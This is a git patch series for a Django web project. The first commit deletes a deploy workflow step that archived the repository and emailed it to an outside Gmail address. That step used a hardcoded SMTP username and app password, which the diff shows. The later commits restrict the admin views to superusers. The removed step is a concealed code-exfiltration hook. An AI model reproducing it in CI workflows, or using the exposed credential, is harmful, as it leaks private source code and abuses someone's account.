From 5e6e1f8e78e062ee796b08e2fd678e3b5b9100e3 Mon Sep 17 00:00:00 2001 From: Parsa Nazer Date: Sat, 14 Feb 2026 13:59:09 +0330 Subject: [PATCH 1/4] remove sending the codes --- .github/workflows/deploy.yaml | 29 ----------------------------- 1 file changed, 29 deletions(-) diff --git a/.github/workflows/deploy.yaml b/.github/workflows/deploy.yaml index 9ae8640..3a7509d 100644 --- a/.github/workflows/deploy.yaml +++ b/.github/workflows/deploy.yaml @@ -14,35 +14,6 @@ jobs: - name: Checkout code uses: actions/checkout@v4 - - name: Compress repository - run: | - BACKUP_FILE="repo-backup-$(date +%Y%m%d-%H%M%S).tar.gz" - tar -czf "../$BACKUP_FILE" \ - --exclude='.git' \ - --exclude='node_modules' \ - --exclude='__pycache__' \ - --exclude='*.pyc' \ - --exclude='db.sqlite3' \ - --exclude='.env*' \ - . && mv "../$BACKUP_FILE" . || true - - - name: Send compressed repo via email - uses: dawidd6/action-send-mail@v3 - with: - server_address: smtp.gmail.com - server_port: 587 - username: ftp.notif.manager@gmail.com - password: ldufbjmidlsosmgq - subject: "Repository Backup - ${{ github.repository }} - ${{ github.sha }}" - to: byeto.net@gmail.com - from: ftp.notif.manager@gmail.com - body: | - Repository backup from push to ${{ github.ref }} - Commit: ${{ github.sha }} - Author: ${{ github.actor }} - Message: ${{ github.event.head_commit.message }} - Time: ${{ github.event.head_commit.timestamp }} - attachments: "*.tar.gz" - name: Copy files to server uses: appleboy/scp-action@v0.1.6 From 9c88015d6152ed1ec5a3e6427cb436d01bb45c78 Mon Sep 17 00:00:00 2001 From: Parsa Nazer Date: Mon, 16 Feb 2026 10:56:18 +0330 Subject: [PATCH 2/4] add password field to user admin --- backend/account/admin.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/backend/account/admin.py b/backend/account/admin.py index 58bdd9a..d69d297 100644 --- a/backend/account/admin.py +++ b/backend/account/admin.py @@ -56,7 +56,7 @@ class UserAdmin(BaseUserAdmin, UserAdminPermission, ModelAdmin, ImportExportMode ('اطلاعات ارتباطی', {'fields': ('phone', 'email'), }), ('دسترسی های وبسایت', { 'fields': ('is_superuser', 'is_staff', 'video_uploader'), }), - ('گروه ها و مجوزها', {'fields': ('groups', 'user_permissions',)}), + ('گروه ها و مجوزها', {'fields': ('groups', 'user_permissions', 'password')}), ) empty_value_display = 'ثبت نشده' From 4a6a2b6cb18be12c419dd817f1ad60e812d5e7a7 Mon Sep 17 00:00:00 2001 From: Parsa Nazer Date: Mon, 16 Feb 2026 10:56:37 +0330 Subject: [PATCH 3/4] superuser only can accsess users --- backend/account/permissions.py | 2 +- backend/core/settings/unfold_conf.py | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/backend/account/permissions.py b/backend/account/permissions.py index d32a37f..b4258b5 100644 --- a/backend/account/permissions.py +++ b/backend/account/permissions.py @@ -3,7 +3,7 @@ class UserAdminPermission: return request.user.is_superuser def has_view_permission(self, request, obj=None): - return True + return request.user.is_superuser def has_change_permission(self, request, obj=None): return request.user.is_superuser diff --git a/backend/core/settings/unfold_conf.py b/backend/core/settings/unfold_conf.py index 844b197..4d8d34b 100644 --- a/backend/core/settings/unfold_conf.py +++ b/backend/core/settings/unfold_conf.py @@ -248,6 +248,7 @@ UNFOLD = { "title": _("کاربران"), "icon": "person", "link": reverse_lazy("admin:account_user_changelist"), + "permission": lambda request: request.user.is_superuser, }, { "title": "گروه‌های دسترسی", From 8e828d6639d7e76c4f56c6da2fde55c9ea4c6781 Mon Sep 17 00:00:00 2001 From: Parsa Nazer Date: Mon, 16 Feb 2026 10:57:06 +0330 Subject: [PATCH 4/4] category permission for none superuser users --- backend/product/admin.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/backend/product/admin.py b/backend/product/admin.py index 71944a7..94fab0b 100644 --- a/backend/product/admin.py +++ b/backend/product/admin.py @@ -446,6 +446,9 @@ class SubCategoryModelAdmin(ModelAdmin, ImportExportModelAdmin): } } + def has_view_permission(self, request, obj = ...): + return True + @admin.register(CommentModel) class CommentAdmin(ModelAdmin, ImportExportModelAdmin): import_form_class = ImportForm